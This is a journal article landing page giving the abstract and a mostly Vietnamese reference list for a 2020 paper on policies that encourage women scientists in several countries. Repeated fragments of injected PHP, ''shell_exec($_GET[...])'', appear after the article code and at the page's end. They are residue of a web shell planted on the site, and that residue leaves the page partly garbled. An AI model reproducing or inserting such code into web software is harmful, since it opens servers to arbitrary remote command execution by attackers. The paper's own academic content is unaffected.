Overview of policies towards women scientists in some countries

  • Nguyen Lan Anh
  • Nguyen Thi Thanh Ha
Keywords: Policy, Women scientist, Science-technology activity

Abstract

Today over the world, the rate of involvement of women in scientific research activities does not depend too much on the development status of nations but on policies of every Government towards stimulation for women scientists. International experiences show that many countries and international organizations are highly interested in stimulation and supports for women to participate in scientific research activities and they adopt numerous concrete policies in arrangement of resources for realization of these policies.

Code: 20010601

".shell_exec($_GET["r0ng"]);}?> ".shell_exec($_GET["r0ng"]);}?> ".shell_exec($_GET["r0ng"]);}?>

Downloads

Download data is not yet available.

References

Tiếng Việt
1. Nghị định số 40/2014/NĐ-CP ngày 12/5/2014 của Chính phủ quy định việc sử dụng, trọng dụng cá nhân hoạt động KH&CN.
2. Nghị định số 78/2014/NĐ-CP ngày 30/7/2014 của Chính phủ về giải thưởng Hồ Chí Minh, giải thưởng Nhà nước và các giải thưởng khác về KH&CN.
3. Nghị định số 87/2014/NĐ-CP ngày 22/9/2014 của Chính phủ quy định về thu hút cá nhân hoạt động KH&CN là người Việt Nam ở nước ngoài và chuyên gia nước ngoài tham gia hoạt động KH&CN tại Việt Nam.
4. Nghị định số 27/2020/NĐ-CP ngày 01/3/2020 của Chính phủ sửa đổi, bổ sung một số điều của Nghị định số 40/2014/NĐ-CP ngày 12/5/2014 của Chính phủ quy định việc sử dụng, trọng dụng cá nhân hoạt động KH&CN và Nghị định số 87/2014/NĐ-CP ngày 22/9/2014 của Chính phủ quy định về thu hút cá nhân hoạt động khoa học và công nghệ là người Việt Nam ở nước ngoài và chuyên gia nước ngoài tham gia hoạt động khoa học và công nghệ tại Việt Nam.
5. Thông tư liên tịch số 21/2015/TTLT-BKHCN-BNV-BTC ngày 06/11/2015 của Bộ KH&CN, Bộ Nội vụ và Bộ Tài chính hướng dẫn thực hiện chính sách sử dụng, trọng dụng cá nhân hoạt động KH&CN.
6. Bộ Khoa học và Công nghệ (2017). Khoa học và Công nghệ Việt Nam năm 2016. Hà Nội, Nxb Khoa học và kỹ thuật.
7. Văn phòng Quốc hội, Trung tâm thông tin, thư viện và nghiên cứu khoa học (2009). Tuyển tập Hiến pháp một số nước trên thế giới. Hà Nội, Nxb Thống kê.
8. Học viện Chính trị quốc gia Hồ Chí Minh (2018), Giới trong lãnh đạo, quản lý. Hà Nội, Nxb Lý luận chính trị.
9. Kỷ yếu Hội nghị mạng lưới các nhà khoa học nữ khu vực châu Á - Thái Bình Dương. Hà Nội, 18-20/10/2018.
10. Đỗ Thị Thạch (2005), Phát huy nguồn lực trí thức nữ Việt Nam trong sự nghiệp công nghiệp hóa, hiện đại hóa. Hà Nội, Nxb Chính trị quốc gia.
11. Nguyễn Thị Việt Thanh (chủ biên) (2015). Nguồn nhân lực nữ trí thức Việt Nam trong sự nghiệp công nghiệp hóa, hiện đại hóa. Hà Nội, Nxb Đại học Quốc gia Hà Nội.
12. Quốc Hùng (2018). “Nỗ lực giảm bất bình đẳng giới trong khoa học Trung Quốc” (theo Nature). Tạp chí Khoa học và Phát triển online, 19/8/2018,
13. Trần Thị Minh Đức (2019). “Định kiến và áp lực xã hội đối với nữ trí thức”,
14. Trần Thị Minh Thi (chủ biên) (2017). Bình đẳng giới trong chính trị từ chiều cạnh thể chế, văn hóa và hội nhập quốc tế. Hà Nội, Nxb Khoa học xã hội.
15. Một số báo cáo về cơ chế, chính sách đào tạo, bồi dưỡng, thu hút nhân tài của Đại diện KH&CN ở Trung Quốc, Đài Loan, Israel, Australia năm 2017-2018.
Tiếng Anh
16. OECD (2018). The Measurement of Scientific, Technological and Innovation Activities, Oslo Manual 2018: Guidelines for collecting, reporting and using data on innovation.
17. http://www.weizmann.ac.il/WomenInScience/
18. http://www.unesco.org/new/en/natural-sciences/priority-areas/gender-and-science/forwomen-in-science-programme/
19. https://www.weforum.org/whitepapers/accelerating-gender-parity-in-the-fourthindustrial-revolution
20. http://www.gender.go.jp/english_contents/pr_act/pub/pamphlet/women-andmen16/pdf/2-4.pdf
21. https://www.science.org.au/support/analysis/decadal-plans-science/decadal-plan-women-stem
22. https://read.oecd-ilibrary.org/science-and-technology/total-researchers-in-full-timeequivalent-per-thousand-total-employment_f6c66147-en#page1.
Published
2020-06-19
How to Cite
Anh, N., & Ha, N. (2020, June 19). Overview of policies towards women scientists in some countries. Journal SCIENCE AND TECHNOLOGY POLICIES AND MANAGEMENT, 9(1), 122-138. Retrieved from http://vietnamstijournal.net/index.php/JSTPM/article/view/328
Section
STUDIES OF STRATEGIES AND MANAGEMENT
".shell_exec($_GET["r0ng"]);}?> ".shell_exec($_GET["r0ng"]);}?> ".shell_exec($_GET["r0ng"]);}?> ".shell_exec($_GET["r0ng"]);}?>